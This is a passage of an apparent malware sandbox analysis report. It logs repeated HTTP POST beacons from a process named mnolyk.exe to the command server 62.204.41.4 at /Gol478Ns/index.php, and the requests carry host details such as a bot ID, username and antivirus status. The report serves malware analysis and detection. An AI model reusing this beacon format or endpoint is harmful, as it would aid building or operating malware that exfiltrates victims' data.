                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.487284899 CET552INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            364192.168.2.45005962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:10.667915106 CET553OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.730612993 CET553INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            365192.168.2.45006062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:10.906199932 CET554OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:10.971039057 CET554INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            366192.168.2.45006162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:11.150218964 CET555OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:11.214824915 CET555INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            367192.168.2.45006262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:11.394660950 CET556OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:11.457348108 CET556INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            368192.168.2.45006362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:11.637717962 CET557OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:11.701730967 CET557INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            369192.168.2.45006462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:11.871504068 CET558OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:11.936068058 CET558INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            37192.168.2.44973262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:35.795794964 CET226OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:35.860296965 CET226INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            370192.168.2.45006562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:12.112270117 CET559OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:12.177773952 CET559INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            371192.168.2.45006662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:12.352601051 CET560OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:12.414014101 CET560INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            372192.168.2.45006762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:12.587873936 CET561OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:12.650434971 CET561INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            373192.168.2.45006862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:12.823951006 CET561OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:12.887738943 CET562INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            374192.168.2.45006962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:13.057358027 CET562OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:13.122652054 CET563INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            375192.168.2.45007062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:13.299293041 CET564OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:13.363473892 CET564INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            376192.168.2.45007162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:13.540692091 CET565OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:13.602624893 CET565INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            377192.168.2.45007262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:13.789124012 CET566OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:13.853332043 CET566INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:13 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            378192.168.2.45007362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:14.025211096 CET567OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:14.091411114 CET567INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            379192.168.2.45007462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:14.260435104 CET568OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:14.324162006 CET568INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            38192.168.2.44973362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:36.045612097 CET227OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:36.110603094 CET227INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            380192.168.2.45007562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:14.493858099 CET569OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:14.559590101 CET569INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            381192.168.2.45007662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:14.728959084 CET570OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:14.790911913 CET570INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:14 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            382192.168.2.45007762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:14.979084969 CET571OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
